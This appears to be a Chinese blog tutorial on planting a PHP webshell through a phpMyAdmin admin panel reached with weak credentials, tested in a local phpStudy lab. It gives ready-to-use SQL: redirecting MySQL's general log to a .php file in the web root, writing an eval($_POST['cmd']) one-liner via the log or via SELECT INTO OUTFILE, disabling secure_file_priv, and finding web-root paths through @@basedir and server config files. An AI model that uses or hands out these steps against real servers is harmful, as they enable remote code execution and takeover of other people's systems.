PhpMyadmin后台拿webshell方法总结

前言：

phpmyadmin后台拿webshell的方法主要分为两个方法：

(1) 、通过日志文件拿webshell;

(2) 、利用日志文件写入一句话;(这个方法可能在实际操作中会遇到困难)；

本地搭建环境：

Phpmystudy 2018

PHP--5.5.38

一、日志文件写入一句话来获取webshell：

(1) 、首先我们先利用日志文件写入一句话来获取webshell，日志文件写入的思路利用mysql的一个日志文件。我们执行的每一个sql语句都会被保存到日志中，换个思路想一下把这个日志文件重名为*.php,然后我们在执行一次sql语句，那么就会被保存在这个*.php文件中，这样我们就能顺利拿到webshell。

(2) 、假如通过某个方法获取到phpmyadmin的登陆后台且账号密码是弱口令：

 

（3）、点击变量选项，搜索gen就会出来general.log和general log file这两个变量，general.log变量是指是否启动记录日志；而general log file指的是日志文件的路径，可以看到general.log变量的状态为OFF，故我们要修改为ON；general log file变量中的*.log的后缀我们改为*php。拿完webshell记得要改回去哟。

SQL语句进行修改：

SET global general_log = "ON"; 日志保存状态开启；
SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/shell.php'; 修改日志的保存位置。

（具体路径还需在实际环境中改变）；

 

修改后的配置

（4）保存后，我们在SQL查询的框中写入

select "<?php eval($_POST['cmd']);?>";
或着 
SELECT '<?phpassert($_POST["cmd"]);?>';

执行完毕后就会出现这个界面，这样的话我们就成功的把一句话写入到日志文件中：

 

（5）、查看网站目录下生成了一个shell.php的文件，一句话木马已经被我们写入，看到这里大家可能会问为什么里面不是纯净的一句话木马？我也百思不得其解，百度了一下发现是我们是上传的php一句话木马，在连接过程中，它是从头开始读取的，因为前面的不具备php文件的特征：

 

（6）、浏览器测试

用菜刀直接连接木马地址，webshell成功拿到：

http://127.0.0.1/shell.php​

 

webshell已经拿到

二、利用插入一句话来提取webshell:

1、在知道路径的前提下插入一句话，

我们在插入一句话木马的时候首先要检测插入的条件是否被允许，输入查询语句

show global variables like '%secure%';

显示是NULL值，这样的情况下我们插入一句话是无法插入的，需要我们修改secure_file_priv=’’为空值才能插入一句话：

解释一下：

• secure_file_priv为null 表示不允许导入导出；
• secure_file_priv指定文件夹时，表示mysql的导入导出只能在指定的文件夹；
• secure_file_priv没有设置时，则表示没有任何限制；

 

当secure_file_priv为null 时，执行插入语句，发现无法插入一句话木马：

select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'E:/phpStudy/PHPTutorial/WWW/shell.php';

 

意思是Mysql服务器运行“--secure-file-priv”选项，所以不能执行这个语句。

如果要解决这个问题，我们可以通过下面2种方式：将你要导入或导出的文件位置指定到你设置的路径里；由于不能在网页上修改，所以我们只能修改my.cnf里关于这个选项的配置，然后重启即可。（windwos下my.cnf叫my.ini）我的在E:\phpStudy\PHPTutorial\MySQL路径下

 

把--secure-file-priv修改为'' 没有这个则添加。

（1）、当我们把上面的障碍扫平之后，接下来就比较简单，我们可以这样写：

select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'E:/phpStudy/PHPTutorial/WWW/shell.php';

意思就是在目录下会生成一个shell.php的文件，我们用菜刀直接连接这个文件地址就可以直接拿到webshell：

 

 

（2）、我们用菜刀直接连接http://127.0.0.1/shell.php就可以成功拿到服务器webshell：

2、在不知道绝对路径的前提下拿webshell：

这个方法几乎和我们做灰盒测试差不多，只拿到了登陆后台，但是不知道网站的绝对路径，这就非常尴尬，下面我总结了一下几点可以成功爆出网站的根路径：

（1）、SQL查询框中输入select @@basedir;就可以成功的输出绝对路径，这是利用了mysql的特性；（这个比较常用，毕竟是mysql的特性）

select @@basedir;

（2）、直接在url后面输入phpinfo.php,看看能不能读出这个文件，如果存在就会把网站的绝对路径显示出来，这样的情况特少，因为网站管理人员不可能把这个测试页面在互联网上面直接显示出来，他们或许会更改路径或许会设置目录访问权限；

（3）、使用扫描工具对网站进行扫扫描；扫描一些phpinfo.php info.php php.php test.php等等；

（4）、phpmyadmin读取 iis6，iis7配置文件 读取apache Nginx 配置文件！

• windows2003 iis6配置文件所在位置          C:\Windows/system32\inetsrv\metabase.xml
• win2008/2012 iis7.5 在这个文件       C:\Windows\System32\inetsrv\config\applicationHost.config
• Nginx配置          /etc/nginx/conf.d/vhost.conf     /etc/nginx/nginx.conf
• apache配置        /etc/httpd/conf/httpd.conf         /usr/local/apache2/conf/httpd.conf

总结

1、利用日志写shell

SET global general_log = "ON"; 日志保存状态开启；
SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/shell.php'; 修改日志保存的位置
SELECT "<?php eval($_POST['cmd']);?>";

2、利用 select XXX into outfile 绝对路径写shell（需要secure_file_priv=''）

select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'E:/phpStudy/PHPTutorial/WWW/shell.php';

3、查找绝对路径

select @@basedir;